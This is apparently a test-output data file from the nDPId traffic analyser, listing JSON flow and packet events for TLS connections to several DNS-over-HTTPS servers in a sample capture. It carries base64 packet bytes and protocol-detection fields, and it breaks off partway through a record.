+00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PY
Nz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcU
EyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} 
+00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} 
+00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEM
TOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h
\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} +00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvq